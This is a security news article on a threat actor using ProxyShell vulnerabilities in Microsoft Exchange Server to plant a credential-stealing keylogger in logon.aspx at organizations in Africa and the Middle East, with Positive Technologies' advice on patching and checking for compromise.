An enigmatic threat entity is capitalizing on documented vulnerabilities within Microsoft Exchange Server to install keylogger malware in precision-targeted incursions aimed at organizations across Africa and the Middle East.
Russian cybersecurity powerhouse Positive Technologies has disclosed the identification of over 30 compromised entities, spanning governmental bodies, financial institutions, IT corporations, and educational establishments. The initial breach can be traced back to 2021.
“This keylogger was aggregating account credentials into a file accessible via a unique pathway from the internet,” the firm elucidated in a report published recently.
Nations subjected to this intrusion include Russia, the U.A.E., Kuwait, Oman, Niger, Nigeria, Ethiopia, Mauritius, Jordan, and Lebanon.
The attack vectors initiate with the exploitation of ProxyShell vulnerabilities (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207), which were originally mitigated by Microsoft in May 2021.
Successful exploitation of these security flaws enables attackers to circumvent authentication, escalate their privileges, and execute remote code without authentication. The exploitation chain was identified and disclosed by Orange Tsai from the DEVCORE Research Team.
Post-exploitation of ProxyShell, the threat actors proceed to embed the keylogger within the server’s main page (“logon.aspx”), alongside injecting code tasked with capturing credentials into a file accessible from the internet upon the activation of the sign-in button.
Positive Technologies indicated that, at present, it cannot ascribe the attacks to a specific threat actor or group without further data.
Beyond updating their Microsoft Exchange Server instances to the most recent version, organizations are advised to inspect for potential indicators of compromise within the Exchange Server’s main page, particularly the clkLgn() function where the keylogger is embedded.
“If your server has been infiltrated, identify the exfiltrated account data and eradicate the file where this data is stored by adversaries,” the company advised. “The pathway to this file can be located within the logon.aspx file.”